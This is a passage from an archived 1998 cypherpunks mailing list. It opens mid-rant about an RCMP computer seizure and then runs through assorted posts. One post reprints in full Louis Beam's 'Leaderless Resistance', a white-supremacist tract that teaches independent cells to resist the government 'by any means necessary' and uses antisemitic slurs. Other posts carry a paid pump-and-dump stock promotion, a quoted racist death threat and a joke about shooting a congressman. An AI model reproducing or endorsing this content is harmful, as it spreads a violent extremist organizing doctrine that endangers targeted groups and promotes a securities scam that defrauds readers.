GoodGuys who bring HimOrHer to Justice (TM), without suffering any
personal losses in the process.
  Skeptical? Ask the RCMP to provide you with a copy of the files on
the computer which they stole from me, after monitoring my website
and emails, which made it clear that my computer fulfilled an essential
role in researching my medical condition, and maintaining effective
treatment for it. Once you receive the files, read one that is named
'warning.sog,' in which Bianca forwards a file purloined from a
Canadian government computer system, which contains a discussion as
to the desirability of putting pressure on me at a time when I am
short on my medications. Do a text search on a file which suggests
that, due to my Tourette Syndrome, it is inadvisable for LEA's to
work me over for merely shouting and cursing, but that if I begin
waving my arms around, they can consider themselves in danger, and
do anything they desire to my sorry ass.

  Think I'm kidding?
  Thanks to the incredible ignorance of LEA's who believe that they
are free to monitor the communications of the citizenry, while the
reverse is illegal and unacceptable, I was afforded the opportunity
to BeatFeet across the U.S. border the day before the Mounties appeared
on my doorstep to steal my computers as punishment for speaking the
Truth, and bury backup copies of my complete hard drive, which contain
information which makes the above 'allegations' seem trite, by
comparison.
  What I find hilarious is that copies of extremely culpatory and
embarassing files/emails were forwarded to a variety of those from
who they originated, yet monitoring of the ongoing investigation
in this regard indicates that the FuckWads are as conscientious
about fucking over the internal investigators as they are about
fucking over the citizenry.
  Equally hilarious is the fact that whoever is in charge of running
the Official RCMP WebSite seems to be unaware that any directory
without an 'index.html' file, when accessed, gives the user access
to *all* of the files in the directory, which makes them a very,
very bad place to wittingly or unwittingly store sensitive files.

  In case you haven't already guessed, I am currently drunk, onery
and mean.
  Any tarantula that bites me is in for a big surprise...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Sat, 25 Jul 1998 11:05:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: A Thousand Points Of Fight
Message-ID: <009C9B44.CC4026A0.7@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain



   Breakthrough Texts 
   Leaderless Resistance
   An Essay by Louis Beam
   
     
     
     "Leaderless Resistance" -- Part One
     
     [IMAGE] The concept of leaderless resistance was proposed by Col.
     Ulius Louis Amoss, who was the founder of International Service of
     Information Incorporated, located in Baltimore, Maryland. Col. Amoss
     died more than 15 years ago, but during his life he was a tireless
     opponent of Communism, as well as a skilled intelligence officer.
     [INLINE] Col. Amoss first wrote of leaderless resistance on April
     17, 1962. His theories of organization were primarily directed
     against the threat of eventual Communist takeover in the United
     States. The present writer, with the benefit of having lived many
     years beyond Col. Amoss, has taken his theories and expounded on
     them.
     [INLINE] Col. Amoss feared the Communists. This author fears the
     federal government. Communism now represents a threat to no one in
     the United States, while federal tyranny represents a threat to
     EVERYONE. The writer has joyfully lived long enough to see the dying
     breaths of Communism, but may unhappily remain long enough to see
     the last dying gasps of freedom in America.
     [INLINE] In the hope that, somehow, America can still produce the
     brave sons and daughters necessary to fight off ever-increasing
     persecution and oppression, this essay is offered. Frankly, it is
     too close to call at this point. Those who love liberty, and believe
     in freedom enough to fight for it, are rare today; but within the
     bosom of every once great nation, there remains secreted the pearls
     of former greatness.
     [INLINE] They are there. I have looked into their sparkling eyes;
     sharing a brief moment in time with them as I passed through this
     life. Relished their friendship, endured their pain, and they mine.
     We are a band of brothers native to the soil, gaining strength one
     from another as we have rushed headlong into battle that all the
     weaker, timid men say we can not win. Perhaps not... but then again,
     perhaps we can. It's not over till the last freedom fighter is
     buried or imprisoned, or the same happens to those who would destroy
     their liberty.
     [INLINE] Barring any cataclysmic events, the struggle will yet go on
     for years. The passage of time will make it clear to even the more
     slow among us that the government is the foremost threat to the life
     and liberty of the folk. The government will no doubt make today's
     oppressiveness look like grade school work compared to what they
     have planned in the future. Meanwhile, there are those of us who
     continue to hope that somehow the few can do what the many have not.
     [INLINE] We are cognizant that before things get better they will
     certainly get worse as government shows a willingness to use ever
     more severe police state measures against dissidents. This changing
     situation makes it clear that those who oppose state repression must
     be prepared to alter, adapt, and modify their behavior, strategy,
     and tactics as circumstances warrant. Failure to consider new
     methods and implement them as necessary will make the government's
     efforts at suppression uncomplicated. It is the duty of every
     patriot to make the tyrant's life miserable. When one fails to do so
     he not only fails himself, but his people.
     [INLINE] With this in mind, current methods of resistance to tyranny
     employed by those who love our race, culture, and heritage must pass
     a litmus test of soundness. Methods must be objectively measured as
     to their effectiveness, as well as to whether they make the
     government's intention of repression more possible or more
     difficult. Those not working to aid our objectives must be
     discarded, or the government benefits from our failure to do so.
     [INLINE] As honest men who have banded together into groups or
     associations of a political or religious nature are falsely labeled
     "domestic terrorists" or "cultists" and suppressed, it will become
     necessary to consider other methods of organization, or as the case
     may very well call for: non- organization.
     [INLINE] One should keep in mind that it is not in the government's
     interest to eliminate all groups. Some few must remain in order to
     perpetuate the smoke and mirrors for the masses that America is a
     "free democratic country" where dissent is allowed. Most
     organizations, however, that possess the potential for effective
     resistance will not be allowed to continue. Anyone who is so naive
     as to believe the most powerful government on earth will not crush
     any who pose a real threat to that power, should not be active, but
     rather at home studying political history.
     [INLINE] The question as to who is to be left alone and who is not,
     will be answered by how groups and individuals deal with several
     factors such as: avoidance of conspiracy plots, rejection of
     feebleminded malcontents, insistence upon quality of the
     participants, avoidance of all contact with the front men for the
     federals - the news media - and, finally, camouflage (which can be
     defined as the ability to blend in the public's eye the more
     committed groups of resistance with mainstream "kosher" associations
     that are generally seen as harmless).
     [INLINE] Primarily though, whether any organization is allowed to
     continue in the future will be a matter of how big a threat a group
     represents. Not a threat in terms of armed might or political
     ability, for there is none of either for the present, but rather,
     threat in terms of potentiality. It is potential the federals fear
     most. Whether that potential exists in an individual or group is
     incidental. The federals measure potential threat in terms of what
     might happen given a situation conducive to action on the part of a
     resistive organization or individual. Accurate intelligence
     gathering allows them to assess the potential. Showing one's hand
     before the bets are made is a sure way to lose.
     [INLINE] The movement for freedom is rapidly approaching the point
     where, for many people, the option of belonging to a group will be
     non-existent. For others, group membership will be a viable option
     for only the immediate future. Eventually, and perhaps much sooner
     than most believe possible, the price paid for membership will
     exceed any perceived benefit. But for now, some of the groups that
     do exist often serve a useful purpose either for the newcomer who
     can be indoctrinated into the ideology of the struggle, or for
     generating positive propaganda to reach potential freedom fighters.
     It is sure that, for the most part, this struggle is rapidly
     becoming a matter of individual action, each of its participants
     making a private decision in the quietness of his heart to resist:
     to resist by any means necessary.
     [INLINE] It is hard to know what others will do, for no man truly
     knows another man's heart. It is enough to know what one himself
     will do. A great teacher once said "know thyself." Few men really
     do, but let each of us promise ourselves not to go quietly to the
     fate our would-be masters have planned.
     [INLINE] The concept of leaderless resistance is nothing less than a
     fundamental departure in theories of organization. The orthodox
     scheme of organization is diagrammatically represented by the
     pyramid, with the mass at the bottom and the leader at the top. This
     fundamental of organization is to be seen not only in armies, which
     are, of course, the best illustration of the pyramid structure, with
     the mass of soldiery (the privates) at the bottom responsible to
     corporals; who are in turn responsible to sergeants, and so on up
     the entire chain of command to the generals at the top. But the same
     structure is seen in corporations, ladies' garden clubs, and in our
     political system itself. This orthodox "pyramid" scheme of
     organization is to be seen basically in all existing political,
     social, and religious structures in the world today, from the
     Federal government to the Roman Catholic Church.
     [INLINE] The Constitution of the United States, in the wisdom of the
     Founders, tried to sublimate the essential dictatorial nature
     pyramidal organization by dividing authority into three: executive,
     legislative, and judicial. But the pyramid remains essentially
     untouched.
     [INLINE] This scheme of organization, the pyramid, is not only
     useless, but extremely dangerous for the participants when it is
     utilized in a resistance movement against state tyranny. Especially
     is this so in technologically advanced societies where electronic
     surveillance can often penetrate the structure, thus revealing its
     chain of command. Experience has revealed over and over again that
     anti-state political organizations utilizing this method of command
     and control are easy prey for government infiltration, entrapment,
     and destruction of the personnel involved. This has been seen
     repeatedly in the United States where pro-government infiltrators or
     agent provocateurs weasel their way into patriotic groups and
     destroy them from within.
     [INLINE] In the pyramid form of organization, an infiltrator can
     destroy anything which is beneath his level of infiltration, and
     often those above him as well. If the traitor has infiltrated at the
     top, then the entire organization from the top down is compromised
     and may be traduced at will.
     
     
     "Leaderless Resistance" -- Part Two
     
     [IMAGE] A recent example of the cell system taken from the left wing
     of politics are the Communists. The Communists, in order to get
     around the obvious problems involved in pyramidal organization,
     developed to an art the cell system. They had numerous independent
     cells which operated completely isolated from one another and
     particularly with no knowledge of each other, but were orchestrated
     together by a central headquarters. For instance, during WWII, in
     Washington, it is known that there were at least six secret
     Communist cells operating at high levels in the United States
     government (plus all the open Communists who were protected and
     promoted by President Roosevelt), however, only one of the cells was
     rooted out and destroyed. How many more actually were operating, no
     one can say for sure.
     [INLINE] The Communist cells which operated in the U.S. until late
     1991 under Soviet control could have at their command a leader who
     held a social position which appeared to be very lowly. He could be,
     for example, a busboy in a restaurant, but in reality a colonel or a
     general in the Soviet Secret Service, the KGB. Under him could be a
     number of cells, and a person active in one cell would almost never
     have knowledge of individuals who were active in other cells; in
     fact, the members of the other cells would be supporting that cell
     which was under attack and ordinarily would lend very strong support
     to it in many ways. This is at least part of the reason, no doubt,
     that whenever in the past Communists were attacked in this country,
     support for them sprang up in many unexpected places.
     [INLINE] The effective and efficient operation of a cell system
     after the Communist model is, of course, dependent upon central
     direction, which means impressive organization, funding from the
     top, and outside support, all of which the Communists had.
     Obviously, American patriots have none of these things at the top or
     anywhere else, and so an effective cell organization based upon the
     Soviet system of operation is impossible.
     [INLINE] Two things become clear from the above discussion. First,
     that the pyramid form of organization can be penetrated quite easily
     and it thus is not a sound method of organization in situations
     where the government has the resources and desire to penetrate the
     structure, which is the situation in this country. Secondly, that
     the normal qualifications for the cell structure based upon the Red
     model does not exist in the U.S. for patriots. This understood, the
     question arises "What method is left for those resisting state
     tyranny?"
     [INLINE] The answer comes from Col. Amoss who proposed the "Phantom
     Cell" mode of organization which he described as Leaderless
     Resistance. A system of organization that is based upon the cell
     organization, but does not have any central control or direction,
     that is in fact almost identical to the methods used by the
     committees of correspondence during the American Revolution.
     Utilizing the Leaderless Resistance concept, all individuals and
     groups operate independently of each other, and never report to a
     central headquarters or single leader for direction or instruction,
     as would those who belong to a typical pyramid organization.
     [INLINE] At first glance, such a form of organization seems
     unrealistic, primarily because there appears to be no organization.
     The natural question thus arises as to how are the "Phantom Cells"
     and individuals to cooperate with each other when there is no
     inter-communication or central direction?
     [INLINE] The answer to this question is that participants in a
     program of leaderless resistance through "Phantom Cell" or
     individual action must know exactly what they are doing and how to
     do it. It becomes the responsibility of the individual to acquire
     the necessary skills and information as to what is to be done. This
     is by no means as impractical as it appears, because it is certainly
     true that in any movement all persons involved have the same general
     outlook, are acquainted with the same philosophy, and generally
     react to given situations in similar ways. The previous history of
     the committees of correspondence during the American Revolution
     shows this to be true.
     [INLINE] Since the entire purpose of leaderless resistance is to
     defeat state tyranny (at least in so far as this essay is
     concerned), all members of phantom cells or individuals will tend to
     react to objective events in the same way through usual tactics of
     resistance. Organs of information distribution such as newspapers,
     leaflets, computers, etc., which are widely available to all, keep
     each person informed of events, allowing for a planned response that
     will take many variations. No one need issue an order to anyone.
     Those idealists truly committed to the cause of freedom will act
     when they feel the time is ripe, or will take their cue from others
     who precede them. While it is true that much could be said against
     this kind of structure as a method of resistance, it must be kept in
     mind that leaderless resistance is a child of necessity. The
     alternatives to it have been shown to be unworkable or impractical.
     Leaderless resistance has worked before in the American Revolution,
     and if the truly committed put it to use themselves, it will work
     now.
     [INLINE] It goes almost without saying that Leaderless Resistance
     leads to very small or even one-man cells of resistance. Those who
     join organizations to play "let's pretend" or who are "groupies"
     will quickly be weeded out. While for those who are serious about
     their opposition to federal despotism, this is exactly what is
     desired.
     [INLINE] From the point of view of tyrants and would-be potentates
     in the federal bureaucracy and police agencies, nothing is more
     desirable than that those who oppose them be UNIFIED in their
     command structure, and that EVERY person who opposes them belong to
     a pyramid style group. Such groups and organizations are easy to
     kill. Especially in light of the fact that the Justice (sic)
     Department promised in 1987 that there would never be another group
     to oppose them that they did not have at least one informer in!
     These federal "friends of government" are ZOG or ADL intelligence
     agents. They gather information that can be used at the whim of a
     federal D.A. to prosecute. The line of battle has been drawn.
     [INLINE] Patriots are REQUIRED, therefore, to make a conscious
     decision to either aid the government in its illegal spying (by
     continuing with old methods of organization and resistance), or to
     make the enemy's job more difficult by implementing effective
     countermeasures.
     [INLINE] Now there will, no doubt, be mentally handicapped people
     out there who will state emphatically in their best red, white, and
     blue voice, while standing at a podium with an American flag draped
     in the background and a lone eagle soaring in the sky above, that,
     "So what if the government is spying? We are not violating any
     laws." Such crippled thinking by any serious person is the best
     example that there is a need for special education classes. The
     person making such a statement is totally out of contact with
     political reality in this country, and unfit for leadership of
     anything more than a dog sled in the Alaskan wilderness. The old
     "Born on the Fourth of July" mentality that has influenced so much
     of the Aryan-American Patriot's thinking in the past will not save
     him from the government in the future. "Reeducation" for
     non-thinkers of this kind will take place in the federal prison
     system where there are no flags or eagles, but an abundance of men
     who were "not violating any laws.".
     [INLINE] Most groups who "unify" their disparate associates into a
     single structure have short political lives. Therefore, those
     movement leaders constantly calling for unity of organization,
     rather than the desirable Unity of Purpose, usually fall into one of
     three categories:
    1. They may not be sound political tacticians, but rather, just
       committed men who feel unity would help their cause, while not
       realizing that the government would greatly benefit from such
       efforts. The Federal objective, to imprison or destroy all who
       oppose them, is made easier in pyramid organizations.
       
    2. Or, perhaps, they do not fully understand the struggle they are
       involved in, and that the government they oppose has declared a
       state of war against those fighting for faith, folk, freedom,
       property and constitutional liberty. Those in power will use any
       means to rid themselves of opposition.
       
    3. The third class calling for unity, and let us hope this is the
       minority of the three, are men more desirous of the supposed power
       that a large organization would bestow, than of actually achieving
       their stated purpose.
       
     [INLINE] Conversely, the LAST thing federal snoops want, if they had
     any choice in the matter, is a thousand different small phantom
     cells opposing them. It is easy to see why. Such a situation is an
     intelligence nightmare for a government intent upon knowing
     everything they possibly can about those who oppose them. The
     Federals, able to amass overwhelming strength of numbers, manpower,
     resources, intelligence gathering, and capability at any given time,
     need only a focal point to direct their anger [ie Waco]. A single
     penetration of a pyramid style organization can lead to the
     destruction of the whole. Whereas, leaderless resistance presents no
     single opportunity for the Federals to destroy a significant portion
     of the resistance.
     [INLINE] With the announcement of the Department of Justice (sic)
     that 300 FBI agents formerly assigned to watching Soviet spies in
     the U.S. (domestic counter-intelligence) are now to be used to
     "combat crime," the federal government is preparing the way for a
     major assault upon those persons opposed to their policies. Many
     anti-government groups dedicated to the preservation of the America
     of our Forefathers can expect shortly to feel the brunt of a new
     federal assault upon liberty.
     [INLINE] It is clear, therefore, that it is time to rethink
     traditional strategy and tactics when it comes to opposing state
     tyranny, where the rights now accepted by most as being inalienable
     will disappear. Let the coming night be filled with a thousand
     points of resistance. Like the fog which forms when conditions are
     right, and disappears when they are not, so must the resistance to
     tyranny be.
     
     Leaderless Resistance first appeared in The Seditionist in 1992. The
     author, Louis Beam, is one of the most respected racialist leaders
     in the world (within racialist circles, that is), and has
     established his own homepage to distribute his work.
       _______________________________________________________________
     
     
     
     Texts Archive: Breakthrough Texts 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Sat, 25 Jul 1998 07:47:55 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: My mom is a stripper/Sporty Spice killed my dog
Message-ID: <19980725132052.8397.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/7/25/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kirk Fort" <k4t@beachaccess.com>
Date: Sat, 25 Jul 1998 10:38:56 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: my thoughts for this list
Message-ID: <01bdb7f2$32c9da60$f0763bcf@interpath.net>
MIME-Version: 1.0
Content-Type: text/plain


I have been getting this list for a few days. I subscribed to this list in
the hopes I could learn something about crypto, in particular the GPG
project.  So far I have seen pretty much nothing about crypto or anything a
person who is not high or crazy could understand.  This list is so messed up
its hillarious.  I didn't want to add to the string of useless messages, but
it doesn't look like anyone cares anyway.  I will be monitoring the list for
any signs of intelligent conversation.

kfort






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: edd@spdy.com
Date: Sun, 20 Dec 1998 19:03:02 -0800 (PST)
Subject: Win the Grand Prize 10 day trip to Hawaii....Enter the drawing!
Message-ID: <600.114268.419843@user932029.nessor.com>
MIME-Version: 1.0
Content-Type: text/plain



Win the Grand Prize 10 day trip to Hawaii....Enter the drawing!!!!. 

Hundreds of valuable prizes will be awarded to the winners of ourexciting drawing.

And one lucky winner will receive a 10-day Hawaiian vacation for two!

It costs nothing to enter. To enter, simply become a preferred e-mailsubscriber to our FREE financial information newsletter. A new winner will be selected everyday! 
There is absolutely no cost to you. 

Receive a FREE 12-month subscription to this informative financial 
information newsletter. You'll receive breaking news on all companies
currently profiled as well as all future profiles as soon as they arereleased. 
The last company profiled was up 92% in one week! 

You must be at least 18 years old to enter.

To enter the drawing go to
http://www.eopop.com/dd/guest_book.htm

HOT STOCK UPDATE

Prime Marketing Inc. (OTC BB-PMMI 1.25) We are hearing that the company has a major order pending with a well-known supermarket chain. Giant's Stadium has just increased their weekly order by 50% for their Sicilian Crust Pizza pies.
We are told that the company is getting ready to launch a national franchise chain with a unique concept in the restaurant industry.
We look for the stock to trade back to the $4.50 & sp; 5.50 level.
Freedom Rock Partners has been paid 50,000 shares of Prime Marketing, Inc. stock as a fee to prepare this report. For more info please see ourdisclaimerhttp://www.eopop.com/dd/disclaimer.htm

Please fill out the form to receive a 12-month free subscription to
our financial information newsletter absolutely free. Go tohttp://www.eopop.com/dd/guest_book.htm

NOTE: 
For those on the Internet who do not want to receive exciting messages
such as this.....to be removed from our mailing list and our affiliate lists 
go to:edd@spdy.comand type remove.

*We strive to comply with all state and federal laws and to send ads onlyto interested parties.


*This ad is not intended for nor do we knowingly send to Washington Stateresidents. 
* Responding to the &quot; return address & quot; will  NOT have your name removed. 

Win the Grand Prize 10 day trip to Hawaii....Enter the drawing!!!!. 

Hundreds of valuable prizes will be awarded to the winners of ourexciting drawing.

And one lucky winner will receive a 10-day Hawaiian vacation for two!

It costs nothing to enter. To enter, simply become a preferred e-mailsubscriber to our FREE financial information newsletter. A new winner will be selected everyday! 
There is absolutely no cost to you. 

Receive a FREE 12-month subscription to this informative financial 
information newsletter. You'll receive breaking news on all companies
currently profiled as well as all future profiles as soon as they arereleased. 
The last company profiled was up 92% in one week! 

You must be at least 18 years old to enter.

To enter the drawing go to
http://www.eopop.com/dd/guest_book.htm

HOT STOCK UPDATE

Prime Marketing Inc. (OTC BB-PMMI 1.25) We are hearing that the company has a major order pending with a well-known supermarket chain. Giant's Stadium has just increased their weekly order by 50% for their Sicilian Crust Pizza pies.
We are told that the company is getting ready to launch a national franchise chain with a unique concept in the restaurant industry.
We look for the stock to trade back to the $4.50 & sp; 5.50 level.
Freedom Rock Partners has been paid 50,000 shares of Prime Marketing, Inc. stock as a fee to prepare this report. For more info please see ourdisclaimerhttp://www.eopop.com/dd/disclaimer.htm

Please fill out the form to receive a 12-month free subscription to
our financial information newsletter absolutely free. Go tohttp://www.eopop.com/dd/guest_book.htm

NOTE: 
For those on the Internet who do not want to receive exciting messages
such as this.....to be removed from our mailing list and our affiliate lists 
go to:edd@spdy.comand type remove.

*We strive to comply with all state and federal laws and to send ads onlyto interested parties.


*This ad is not intended for nor do we knowingly send to Washington Stateresidents. 
* Responding to the &quot; return address & quot; will  NOT have your name removed. 

Win the Grand Prize 10 day trip to Hawaii....Enter the drawing!!!!. 

Hundreds of valuable prizes will be awarded to the winners of ourexciting drawing.

And one lucky winner will receive a 10-day Hawaiian vacation for two!

It costs nothing to enter. To enter, simply become a preferred e-mailsubscriber to our FREE financial information newsletter. A new winner will be selected everyday! 
There is absolutely no cost to you. 

Receive a FREE 12-month subscription to this informative financial 
information newsletter. You'll receive breaking news on all companies
currently profiled as well as all future profiles as soon as they arereleased. 
The last company profiled was up 92% in one week! 

You must be at least 18 years old to enter.

To enter the drawing go to
http://www.eopop.com/dd/guest_book.htm

HOT STOCK UPDATE

Prime Marketing Inc. (OTC BB-PMMI 1.25) We are hearing that the company has a major order pending with a well-known supermarket chain. Giant's Stadium has just increased their weekly order by 50% for their Sicilian Crust Pizza pies.
We are told that the company is getting ready to launch a national franchise chain with a unique concept in the restaurant industry.
We look for the stock to trade back to the $4.50 & sp; 5.50 level.
Freedom Rock Partners has been paid 50,000 shares of Prime Marketing, Inc. stock as a fee to prepare this report. For more info please see ourdisclaimerhttp://www.eopop.com/dd/disclaimer.htm

Please fill out the form to receive a 12-month free subscription to
our financial information newsletter absolutely free. Go tohttp://www.eopop.com/dd/guest_book.htm

NOTE: 
For those on the Internet who do not want to receive exciting messages
such as this.....to be removed from our mailing list and our affiliate lists 
go to:edd@spdy.comand type remove.

*We strive to comply with all state and federal laws and to send ads onlyto interested parties.


*This ad is not intended for nor do we knowingly send to Washington Stateresidents. 
* Responding to the &quot; return address & quot; will  NOT have your name removed. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dutra de Lacerda <dulac@ip.pt>
Date: Sat, 25 Jul 1998 11:53:23 -0700 (PDT)
To: "kryz" <chrisharwig@hetnet.nl>
Subject: Re: Larry King
In-Reply-To: <MAPI.Id.0016.0072797a202020203030303430303034@MAPI.to.RFC822>
Message-ID: <4.0.1.19980725194807.00f85580@mail2.ip.pt>
MIME-Version: 1.0
Content-Type: text/plain


At Saturday, you wrote:
>Some whisper that Larry King is the incarnation of the frog, mentioned in
>the book Some Like It Green, written by William Chutov.
>Can this be true? I have bad dreams about it.
>Please, help me out!

Wrong assumption. 
Frogs are no aliens.
Ergo IT (Larry) is no frog.

Dulac.




 - - - 
Antonio Manuel Melo de Carvalho Dutra de Lacerda
Morada		: Rua Rodrigues Cabrilho, 5 - 5 Esq.
		  1400 Lisboa, PORTUGAL
Telefone	: +351-(1)-3013579
FAX & BBS	: +351-(1)-3021098




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Sat, 25 Jul 1998 17:42:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: my thoughts for this list
Message-ID: <8ef13d67.35ba7b33@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 7/25/98 6:45:41 PM Central Daylight Time,
k4t@beachaccess.com writes:

<< I have been getting this list for a few days. I subscribed to this list in
 the hopes I could learn something about crypto, in particular the GPG
 project.  So far I have seen pretty much nothing about crypto or anything a
 person who is not high or crazy could understand. >>

Both help to make a hacker, from what I understand. :-)


<< This list is so messed up
 its hillarious.  I didn't want to add to the string of useless messages, but
 it doesn't look like anyone cares anyway.  I will be monitoring the list for
 any signs of intelligent conversation. >>

It may be because there are certain hackers getting inbetween those that want
to actually say something, and the list.  Fact is, I just unsubscribed from
this list, but my e-mail apparently didn't make it to the server.

Must be because I'm on AOL, 'right'?  ;-)

Stan,
The MOST Important Page on the Net -
http://members.aol.com/whtsametau/camel/index.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Sat, 25 Jul 1998 04:49:21 -0700 (PDT)
To: Anonymous <nobody@replay.com>
Subject: Re: Todd Bowers: Dumbass
In-Reply-To: <199807240605.IAA00062@replay.com>
Message-ID: <3.0.5.32.19980725214751.0087d210@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain


At 08:05 AM 24 07 98 +0200, Anonymous wrote:
>On Thu, 23 Jul 1998, Todd Bowers wrote:
>
>> cool ..... i am 13
>> 
>
>Actually, your being a complete dumbass overshadows your being 13.
>

Not to mention you forgot to use 3l33t zp33l1n6.

Reeza!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Sat, 25 Jul 1998 05:27:59 -0700 (PDT)
To: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Subject: Re: Iz that real?
In-Reply-To: <009C9AA3.421B6260.5@west.cscwc.pima.edu>
Message-ID: <3.0.5.32.19980725222452.00886100@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain


At 03:50 PM 24 07 98 MST, Linda Reed--PCC West Campus CSC wrote:
>X-URL: mailto:cypherpunks@toad.com
>X-Mailer: Lynx, Version 2-4-2
>X-Personal_name: Linda Reeza
>X-From: obvious@forgery.eff
>
>Reeza,
>  Stop hacking those military computer accounts, and quit backtalking
>to your teacher, or you'll never get out of grade 4...
>

Dear Linda:

I'm not hacking a military account.

Sincerely,

Reeza!

ps- which school of mine did you sub in?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Sat, 25 Jul 1998 20:00:08 -0700 (PDT)
To: cypherpunks@toad.com
Subject: RE: my thoughts for this list +
Message-ID: <19980726030004.11032.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 7/25/98 6:45:41 PM Central Daylight Time, k4t@beachaccess.com writes:

<< I have been getting this list for a few days. I subscribed to this list in
 the hopes I could learn something about crypto, in particular the GPG
 project.  So far I have seen pretty much nothing about crypto or anything a
 person who is not high or crazy could understand. >>

Both help to make a hacker, from what I understand. :-)


<< This list is so messed up
 its hillarious.  I didn't want to add to the string of useless messages, but
 it doesn't look like anyone cares anyway.  I will be monitoring the list for
 any signs of intelligent conversation. >>

It may be because there are certain hackers getting inbetween those that want to actually say something, and the list.  Fact is, I just unsubscribed from this list, but my e-mail apparently didn't make it to the server.

Must be because I'm on AOL, 'right'?  ;-)

Here's another post that didn't seem to make it through-
======
In a message dated 7/24/98 10:12:55 AM Central Daylight Time, 0_rcummi@funrsc.fairfield.edu writes:

<< > WHY CANT I FIND ANY WHITE AMERICAN YOUTH ALBUMS ANYWHERE?   
 > 
 > 
 
 Reason 1:  You're from AOL
 Reason 2:  You don't know where the caps lock key is
 Reason 3:  You're looking on the cypherpunks list for music.
 Reason 4:  You're from AOL >>

Tee, hee hee.

I didn't find it on Cypherpunks (I didn't even check Cypherpunks for it :-) ), it's from some media article.  It described a incident that happened when someone complained about someone elses loud music -

<< Patrol officers had 
 to bang on Joseph W. Wedemeyer's door for about 
 15 minutes before getting his attention, Capt. Robert 
 Linardi said. They charged him with disorderly conduct.
 
 The next afternoon, Linardi said, Wedemeyer confronted 
 his neighbor on the street. Linardi said Wedemeyer, 
 who is white, called the neighbor, who is black, a 
 racial epithet and said, "I'm going to kill you." ... >>

That's the kind of music you're talking about, 'right'?

I heard they were after Tom('s) DeLay(ed Resignation), but they missed.  Direct hits to his brains and his heart, though!  ;-)
=====
Stan (StanSqncrs@AOL.com)
The MOST Important Page on the Net -
http://members.aol.com/whtsametau/camel/index.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Sun, 26 Jul 1998 04:42:18 -0700 (PDT)
To: cypherpunks@toad.com
Subject: GodLess - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <009C9BD8.781EFBC0.1@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


GodLess Capitalists - SPACE ALIENS HIDE M DRUGS!!!
___________________________________________________

"Centralism is dead," says Hayek; however, according to Friedman, it 
is not so much centralism that is dead, but rather the futility, and 
subsequent genre, of centralism. Dialectic construction states that 
government is capable of truth, given that culture is distinct from 
sexuality. Gonzalo implies that we have to choose between the textual 
paradigm of discourse and dialectic cultural theory. It could be said 
that the primary theme of Fielding's essay on Saussurean semiotics is 
the failure, and hence the rubicon, of patriarchialist truth.

"Class is part of the collapse of reality," says Lyotard. In a sense, 
the example of dialectic construction prevalent in JFK is also evident 
in Heaven and Earth, although in a more mythopoetical sense. Habermas 
promotes the use of the textual paradigm of discourse to attack 
colonialist perceptions of language.

In the works of Vinge, a predominant concept is the concept of
neocapitalist consciousness. But Lacan uses the term 'Saussurean 
semiotics' to denote the role of the observer as participant. The 
subject is interpolated into a structuralist paradigm of expression 
that includes truth as a totality.

If one examines the textual paradigm of discourse, one is faced with 
a choice: either accept dialectic construction or conclude that 
expression must come from the masses, but only if the premise of 
semiotic theory is valid; otherwise, truth is part of the praxis of 
sexuality. Hughes holds that we have to choose between Saussurean 
semiotics and dialectic construction.
Milhon's critique of the textual paradigm of discourse suggests
that the task of the reader is social comment.

--Herr Doktor Prof. T.C. May, Ing.


  See, I told you Tim May knew about that sort of crap.

  Now, Greg Broiles told me that he knew T.C. May, and I'm no Tim May, 
and I don't know all those fancy, intellectual words, but I've never 
found anything that couldn't be adequately described using the eight 
words you can't say on the InterNet, so I'm going to tell you all
about why the GodLess Commies kicked the MindsOfTheMassesAsses so bad
that that RockyFeller figured that if he could discover the secret of
the BullShitVic Schtick, he could finally realize his dream of having
more Dogamned money than the Pope.

  Marx and Stalin and Lenin and Chairperson Mao knew all about that
1984 stuff about controlling the people by controlling the language
and symbolism. 
  They also understood, like I explained before, that you don't want
your NewOldLady looking at a picture of her old boyfriend while you're
sticking your dick in her, so all of his crap, like his old love-
letters and the shirts he left behind, has got to go.
  Even more, the GodLess Commies knew that it wasn't enough to just
throw the OldBoyfriend's shit out, you had to 'deconstruct' your
NewOldLady's memory of him, even if you had to wipe her fucking mind
out with electroshock and make her listen to tape-loops.

  That RockyFeller kind of knew that, since he was doing the couch-
